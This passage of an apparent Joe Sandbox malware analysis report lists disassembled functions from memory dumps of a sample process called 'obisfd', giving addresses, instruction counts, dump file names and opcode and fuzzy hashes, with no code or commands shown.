                                                                                            • Instruction Fuzzy Hash: 49C1B174E01218CFDB54DFA5C994B9DBBB2BF89300F1084A9E409AB395EB359E81CF50
                                                                                            Function 004F3760 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7fefc117043cda4c63f46df1886591d15893c2d71047214e138a69c78db877e
                                                                                            • Instruction ID: bb213cd04291294faa9c56e684200bc5890d7eb27cc806c1003287a36af861f4
                                                                                            • Opcode Fuzzy Hash: d7fefc117043cda4c63f46df1886591d15893c2d71047214e138a69c78db877e
                                                                                            • Instruction Fuzzy Hash: C5C1C174E01218CFDB54DFA5C994BADBBB2BF89300F1084AAD409AB355DB35AE81CF54
                                                                                            Function 006E5F28 Relevance: .3, Instructions: 253COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 635ee09417c58096718c84684f8f00423b19689761e5252f00fbe36c65c12212
                                                                                            • Instruction ID: 9c6930c1a8db570818955dfe661569dbc024815a9e312ae75ec26611cfd92d3c
                                                                                            • Opcode Fuzzy Hash: 635ee09417c58096718c84684f8f00423b19689761e5252f00fbe36c65c12212
                                                                                            • Instruction Fuzzy Hash: BF917E75901354CFE714EFA0E85C7EEBBB2AB49306F10952AE5017B2E4CB784A44CF54
                                                                                            Function 006E5F38 Relevance: .2, Instructions: 247COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2ce6013e3d0ead9935020f8943b72771f661b58e999e353e90bc1e950b199b1
                                                                                            • Instruction ID: 06b3042e954992b26194daf8f5d9f181dcb1de72773e96dda14b1574b8fa399b
                                                                                            • Opcode Fuzzy Hash: b2ce6013e3d0ead9935020f8943b72771f661b58e999e353e90bc1e950b199b1
                                                                                            • Instruction Fuzzy Hash: 88917D75800754CFE714AFA0E85C7EEBBB2AB49306F10952AE1017B3E4CB784A84CF54
                                                                                            Function 006E2B00 Relevance: .2, Instructions: 222COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5d7c9e8d3d90cdb014c52a1c0b1540f63fa1335d98438ce7838bee1f8eda738f
                                                                                            • Instruction ID: e1a6d327316295054d345a4ed9f73b681a2ceb1d01851feec14ee4afc8f13f11
                                                                                            • Opcode Fuzzy Hash: 5d7c9e8d3d90cdb014c52a1c0b1540f63fa1335d98438ce7838bee1f8eda738f
                                                                                            • Instruction Fuzzy Hash: 67B1A474E00218CFDB54DFA9D994A9DBBB2FF89310F2481A9D819AB365DB30AD41CF50
                                                                                            Function 00306FEA Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5d955c9f732faa9ae018fbbae3fae94ea802ab61ab319732e423d86258c991af
                                                                                            • Instruction ID: 7bbf1ae690f771445da1f73e8e12a1b1649861f89c7745f483171d5f3e298ad8
                                                                                            • Opcode Fuzzy Hash: 5d955c9f732faa9ae018fbbae3fae94ea802ab61ab319732e423d86258c991af
                                                                                            • Instruction Fuzzy Hash: 39A18E74A01228CFDB65DF24C894B9EBBB2BB4A304F5085EAD40DA7350DB75AE81CF50
                                                                                            Function 006E2AF9 Relevance: .1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eed4c9bfe6dc245d96a3a1089ca1fb08099b6cea88f37f5b43482149ecc8cb05
                                                                                            • Instruction ID: 93d5890460c13c7acb497909aee5919390c48d4b877c6a3daeb6b51029ebf720
                                                                                            • Opcode Fuzzy Hash: eed4c9bfe6dc245d96a3a1089ca1fb08099b6cea88f37f5b43482149ecc8cb05
                                                                                            • Instruction Fuzzy Hash: 0B517274E016488FDB58DFAAD994A9DBBF2BF89300F24C169D419AB365DB309942CF10
                                                                                            Function 003071C9 Relevance: .1, Instructions: 116COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38dcb06e47a3c41f104c6a645eb14efc5b371f79b6b61c004d1b22f22a6fb0d0
                                                                                            • Instruction ID: 1fe4c970482b53e3710fd4e5cd4c579bcb411aa073e5864e028a57dd82323a2d
                                                                                            • Opcode Fuzzy Hash: 38dcb06e47a3c41f104c6a645eb14efc5b371f79b6b61c004d1b22f22a6fb0d0
                                                                                            • Instruction Fuzzy Hash: 2051A574A01228CFCB65DF24D894BAEB7B2BF4A305F5085EAD409A7350DB75AE81CF50